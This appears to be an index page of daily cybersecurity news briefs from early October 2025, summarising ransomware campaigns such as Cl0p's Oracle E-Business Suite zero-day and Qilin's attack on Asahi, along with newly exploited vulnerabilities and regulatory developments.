This cybersecurity brief for October 9, 2025, covers a surge in critical threats, led by the Cl0p ransomware gang's exploitation of a zero-day vulnerability (CVE-2025-61882) in Oracle's E-Business Suite. A significant trend this period is the abuse of legitimate tools, with threat actors weaponizing the Velociraptor DFIR tool and exploiting a critical flaw (CVE-2025-10035) in Fortra's GoAnywhere MFT. Other major events include the Qilin ransomware attack on Japanese beverage giant Asahi, a sophisticated phishing campaign targeting marketing professionals, and new guidance from the G7 and UK's NCSC on managing AI risks and a sharp rise in national-level cyberattacks.

Oct 8, 20258 articles

Salesforce Defies Extortionists After Customer Data Heist; Cl0p Exploits Critical Oracle Zero-Day

This cybersecurity brief for October 8, 2025, covers several critical incidents. A threat actor alliance named 'Scattered LAPSUS$ Hunters' claims to have stolen data from over 40 Salesforce customers via social engineering, though Salesforce itself was not breached and refuses to pay the ransom. Concurrently, the Cl0p ransomware group is actively exploiting a critical zero-day vulnerability (CVE-2025-61882) in Oracle's E-Business Suite. Other major events include a significant data breach at a Red Hat consulting GitLab instance exposing sensitive client data, a ransomware attack by the Qilin group on Japanese beverage giant Asahi, and CISA adding a Zimbra XSS flaw to its KEV catalog.

Oct 7, 20259 articles

Clop Exploits Oracle Zero-Day; CISA Catalogs Multiple Actively Exploited Flaws

This cybersecurity advisory for October 7, 2025, covers a critical period marked by the active exploitation of a zero-day vulnerability (CVE-2025-61882) in Oracle E-Business Suite by the Clop ransomware group, prompting urgent international warnings. Concurrently, CISA has added several other flaws to its KEV catalog, including vulnerabilities in Microsoft Windows and Zimbra. Other major developments include a new extortion campaign by the 'Scattered Lapsus$ Hunters' collective targeting Salesforce customers, a critical RCE flaw in Redis, and Signal's threat to exit the EU over the proposed 'Chat Control' surveillance bill.

Oct 6, 202510 articles

Microsoft Patches 3 Zero-Days Under Active Attack; Cl0p, Qilin, and Flax Typhoon Launch Major Campaigns

In the period of October 5-6, 2025, the cybersecurity landscape was dominated by Microsoft's massive October Patch Tuesday, which addressed 175 vulnerabilities including three actively exploited zero-days. Concurrently, major threat actors launched significant campaigns: the Cl0p ransomware group exploited a zero-day in Oracle E-Business Suite for mass extortion, the Qilin gang crippled Asahi Breweries demanding a $10M ransom, and the Chinese APT Flax Typhoon was found using a novel ArcGIS server backdoor for long-term espionage. Other key events include a major escalation in the SonicWall data breach, a novel phishing technique abusing the NPM registry, and new warnings from CISA regarding widespread ICS vulnerabilities.

Oct 5, 202510 articles

Main Sections

Home

Latest cybersecurity threats and intelligence

Articles

In-depth security analysis and reports

Publications

Curated threat intelligence briefings

Legal & Information

Privacy PolicyTerms of ServiceDisclaimer